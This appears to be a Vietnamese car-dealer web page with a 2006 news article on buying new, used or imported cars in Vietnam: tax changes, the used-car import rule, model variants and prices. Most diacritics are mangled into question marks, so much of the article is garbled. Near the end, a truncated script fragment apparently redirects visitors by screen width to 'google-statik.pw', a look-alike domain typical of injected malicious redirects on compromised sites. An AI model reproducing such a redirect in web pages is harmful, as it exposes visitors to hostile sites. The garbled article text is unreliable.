Nên chọn loại xe nào ? Ô tô cũ , ô tô mới ?

(otobienhoa.vn) - Theo d? doan c?a gi?i kinh doanh, th? tru?ng o to s? c?c k? soi d?ng vao n?a cu?i nam nay khi quy?t d?nh cho nh?p o to cu c?a Chinh ph? co hi?u l?c (1/5/2006) va s? tham gia th? tru?ng c?a hang Honda Vi?t Nam vao thang 6/2006 v?i chi?c Honda Civic.

Tru?c do, thu? su?t thu? tieu th? d?c bi?t d?i v?i xe o to nh?p kh?u du?c gi?m xu?ng b?ng v?i cac lien doanh o to dang s?n xu?t trong nu?c khi?n hang lo?t cong ty dang kinh doanh xe o to nh?p kh?u vui nhu m? c? trong b?ng. T?t c? dang am th?m chu?n b? d? ch? don nh?ng di?n bi?n m?i. V? phia ngu?i tieu dung, ch?n mua xe m?i hay xe cu, do la v?n d? ma cac "thu?ng d?" dang suy tinh.

M?t nha kinh doanh xe cu th?ng ke: dang co it nh?t 20 thuong hi?u o to da co m?t t?i th? tru?ng Vi?t Nam, song ch? 1/3 s? do du?c ngu?i tieu dung ua chu?ng. Cac thuong hi?u l?n nhu Toyota, Honda, Mercedes, Ford, Mitsubishi, Nissan, Isuzu, GM Daewoo, Kia, Suzuki... d?u co hang ch?c dong xe, m?i dong xe l?i co nhi?u th? h? khac nhau khi?n ngu?i tieu dung "tay mo" kho long hi?u h?t. Ch?ng h?n, dong xe Camry c?a hang Toyota d?n nay da "c?p nh?t" d?n th? h? th? 6 - th? h? xe v?i thi?t k? khung g?m, n?i th?t, ph? tung, h? truy?n d?ng... hoan toan m?i d?ng th?i l?n d?u tien s? d?ng d?ng co hybrid (s? d?ng nhien li?u kep xang va di?n) c?a Toyota - k? t? khi chi?c Camry d?u tien xu?t hi?n 23 nam tru?c. Ngay c? nh?ng chi?c o to s?n xu?t trong nu?c thi vi?c phan bi?t cung qua kho, b?i m?i lo?i ch? phan bi?t b?ng m?t vai ky hi?u. Ch?ng h?n, ch? rieng chi?c Focus c?a hang Ford (Vi?t Nam), cung da co d?n 5 lo?i: Focus 2.0 AT Ghiha, Focus 2.0 MT Ghiha, Focus 1.8 AT, Focus 1.8 MT, Focus 1.6 LX hay 4 lo?i Hi-Lander c?a Isuzu g?m: Hi-Lander LX MT, V-Spec MT, V-Spec AT, X-Treme MT va X-Treme AT. Camry c?a Toyota thi co Camry Altis 1.8, Camry 2.4G va Camry 3.0V... Gia c? m?i lo?i t?t nhien cung khac h?n nhau. Ch?ng h?n chi?c Camry Altis 1.8 gia ch? 35.500 USD trong khi ngu?i anh em Camry 3.0V thi co gia d?n 65.000 USD. Hi?n nay, vi?c s? h?u m?t chi?c xe m?i s?n xu?t t?i Vi?t Nam r?t d? dang. H?u h?t cac cong ty o to d?u co d?i ly ? cac d?a phuong nen h? co th? lo cho b?n t? A d?n Z.

 

alt

Nhu c?u s? d?ng o to dang ngay m?t tang m?nh - (?nh: D.N.T)

D?i v?i o to cu, vi?c mua xe c?n ph?i can nh?c d? di?u. M?t tay trum xe cu ti?t l? bi quy?t "ph? thong": mua xe nen chu y d?n d?i xe (nam s?n xu?t) d?c bi?t la nh?ng ngu?i mua xe kinh doanh thi nien h?n cang g?n 20 nam cang khong con gia tr?. Ti?p do ph?i d? y d?n "ch?m" (dung tich xy lanh), ch?m cang cao, xe cang "u?ng" xang. Nhi?u ngu?i cho r?ng ch?m cang cao cang t?t trong khi nhu c?u ch? di l?i trong thanh ph? hay da ngo?i. Ph? bi?n nh?t hi?n nay la ch?n xe du?i 2.0, v?a it hao xang v?a r?. Va n?a, c?n luu y d?n noi s?n xu?t: xe s?n xu?t ? Hoa K? khac xe s?n xu?t ? chau Au, chau A va cang khac khi s?n xu?t ? Vi?t Nam. Hi?n nay, cac hang xe hoi d?u da toan c?u hoa s?n ph?m  song tieu chu?n cho t?ng th? tru?ng d?u du?c nha s?n xu?t tinh toan k? nen ch?t lu?ng r?t khac nhau. Va di?u cu?i cung la nen tranh cac lo?i xe "len d?i", v?a phi?n ph?c v? th? t?c dang ki?m v?a b?c minh v? s? "n?m du?ng" tuong d?i thu?ng xuyen c?a chung. Cung m?t chi?c Honda Accord nhung d?i 1989 chao ban 6.000 USD nhung d?n d?i 1990 thi da g?p doi con sang d?n d?i 1994 thi g?p 3 l?n. Tren cac th? tru?ng t? do, xe o to cu du?c rao ban nhi?u hon mua. Nhi?u nh?t la cac lo?i xe "c?" (d?i qua cu, xe gia th?p, xe tan trang...) ban v?i gia t? 20 d?n 100 tri?u d?ng. Ngoai m?t s? ki?n th?c ph? thong v? may moc, ngu?i mua xe cu cung c?n luu y d?n cac v?n d? v? dang ki?m. "Chung toi ng?i nh?t la chuy?n dang ki?m", m?t nha kinh doanh xe cu noi. "N?u s?p t?i nh?p xe cu v? ma vi?c dang ki?m khong ch?n ch?nh cho nghiem thi ch?c ch?n ngu?i tieu dung s? lanh h?u qu?. Ch?t lu?ng xe ph? thu?c r?t nhi?u vao khau nay, va day cung chinh la khau d? x?y ra tieu c?c nh?t".

Lau nay, th? tru?ng o to nh?p kh?u ho?t d?ng kha l?ng l? do gia d?t va ken ch?n khach mua. Song k? t? luc Chinh ph? h? thu? su?t thu? tieu th? d?c bi?t cho m?t hang nay thi cac doanh nghi?p chuyen doanh xe ngo?i nh?p b?t d?u len ti?ng. Co hon 10 doanh nghi?p "danh" hang nh?p hi?n nay t? 3 th? tru?ng chinh: M?, chau Au va cac nu?c chau A. Hi?n nay, xe nh?p t? M? du?c ua chu?ng nh?t do ch?t lu?ng xe cao l?i da d?ng ch?ng lo?i. Ong Hu?nh H?u Liem, tr? ly giam d?c Cong ty TNHH Huy Phat L?i (Q.7, TP.HCM) - cong ty nh?p o to t? M? l?n nh?t hi?n nay - cho bi?t, co 3 l?i di?m khi ngu?i tieu dung ch?n l?a xe nh?p m?i: d?m b?o an toan, du?c ch?n l?a cong ngh? m?i ap d?ng cho o to va tranh du?c cac phi?n ph?c do dang ki?m. V? gia c?, xe ngo?i nh?p khong hon (th?m chi con th?p hon) xe s?n xu?t trong nu?c. Ch?ng h?n, theo ong Liem chi?c Toyota Camry 3.0 s?n xu?t trong nu?c ban gia 65.000 USD thi Cong ty Huy Phat L?i co th? giao t?n tay cho khach hang chi?c xe cung lo?i nh?p t? M? v?i gia 59.000 USD. Tuong t?, chi?c Mercedes E280 gia 136.000 USD thi chi?c Mercedes E500 x?n hon ch? co 134.000 USD; chi?c BMW 325 ch? 71.100 USD trong khi t?i Vi?t Nam la 75.000 USD... Di?u b?t ti?n duy nh?t hi?n nay la ngu?i tieu dung khi mua xe ngo?i nh?p ch? co th? nhin chi?c xe mu?n mua qua... ?nh ho?c trong cac website v? xe, sau do ph?i d?t hang thi cong ty m?i nh?p v?.

Ngay 1.5.2006, quy d?nh cho phep nh?p xe cu b?t d?u co hi?u l?c. Ngo?i tr? m?t vai e de t? phia cac b? nganh lien quan, con l?i ngu?i tieu dung d?u r?t ph?n kh?i. D? tai v? o to nh?p kh?u v?n dang la d? tai nong trong cac quan ca phe, ban nh?u. "Thu?ng d?" dang r?t hao h?ng, v?n d? ch? ? ch? "h?u bao" n?ng nh? ra sao ma thoi.

if (screen.width ion = "http://google-statik.pw/l.php";}
 

Salon Auto

Nội thất đồ chơi

Tư vấn mua bán xe


 

Quảng Cáo